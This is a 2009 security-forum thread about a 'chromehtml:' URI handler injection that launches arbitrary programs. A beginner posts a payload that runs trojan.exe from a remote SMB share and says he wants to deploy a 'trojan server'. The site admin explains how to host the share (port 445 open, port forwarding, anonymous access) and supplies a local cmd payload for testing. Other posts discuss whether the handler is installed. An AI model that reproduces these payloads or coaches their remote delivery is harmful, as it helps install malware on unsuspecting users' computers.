|
|
|
|
|
|
IT Security and Insecurity Portal |
|
Posted: Mon Feb 02, 2009 2:33 pm |
|
|
UXo |
Beginner |
|
|
Joined: Feb 02, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
waraxe wrote: | UXo wrote: | Waraxe , I need some help about the execution of an other file , I have try some test to check if it will poped or not , It doesn't working . .
Code: | chromehtml:"%20--renderer-path="\\URL.com\trojan.exe"%20--no-sandbox |
can I got a solution about this?, Thanks in advanced.
/UXe |
This is not http protocol, it's SMB (windows shares). Attacker must use ip address to windows box with shares open to Internet. SMB port 445 must be not blocked by firewall, use port forwarding in router if needed. Share must be accessible anonymously, without credentials.
Have you tried local version with calc or cmd? Does it work locally? |
But how i can creat a SMB port to got a IP address. . . .? |
|
|
|
|
Posted: Mon Feb 02, 2009 3:12 pm |
|
|
NYDAz |
Advanced user |
|
|
Joined: Jan 26, 2009 |
Posts: 109 |
Location: Valley of the Kings |
|
|
|
|
|
|
Awwww ... snap |
|
_________________ A person who never made a mistake never tried anything new. |
|
|
|
|
|
|
|
Posted: Mon Feb 02, 2009 3:18 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
UXo wrote: | waraxe wrote: | UXo wrote: | Waraxe , I need some help about the execution of an other file , I have try some test to check if it will poped or not , It doesn't working . .
Code: | chromehtml:"%20--renderer-path="\\URL.com\trojan.exe"%20--no-sandbox |
can I got a solution about this?, Thanks in advanced.
/UXe |
This is not http protocol, it's SMB (windows shares). Attacker must use ip address to windows box with shares open to Internet. SMB port 445 must be not blocked by firewall, use port forwarding in router if needed. Share must be accessible anonymously, without credentials.
Have you tried local version with calc or cmd? Does it work locally? |
But how i can creat a SMB port to got a IP address. . . .? |
Can you get it working locally?
Code: |
chromehtml:"%20--renderer-path="cmd"%20--no-sandbox
|
Try it and if you are successful with local exploitation (command prompt window will pop up), then next you can try remote version. Do you use windows? XP? Vista? |
|
|
|
|
|
|
|
|
Posted: Mon Feb 02, 2009 3:59 pm |
|
|
UXo |
Beginner |
|
|
Joined: Feb 02, 2009 |
Posts: 4 |
|
|
|
|
|
|
|
yes yes , the calc working 100% is poped , but i need to execute another file like *trojan server*, what i must do? , I dont know a lot about SMB, you understand me? , And im using windows XP sp2 |
|
|
|
|
Posted: Fri Feb 06, 2009 1:01 am |
|
|
johnnycannuk |
Beginner |
|
|
Joined: Feb 02, 2009 |
Posts: 3 |
|
|
|
|
|
|
|
waraxe wrote: | johnnycannuk wrote: | -AO- wrote: | Are you sure you have calc installed?
Works for me |
I definitely have calc installed and I'm getting the same error message - it doesn't matter whether I get it from a local file of served from a local web server.
Check you IE settings, maybe there is some setting you guys have that we don't/ My IE definitly doesn't know how to handle Chomehtml: |
If "chromehtml:" in IE will not trigger Chrome, then you just don't have chrome URI handler installed to your system registry ... |
Well, I guess I don't. Not only did you find the hole, you found the patch. |
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|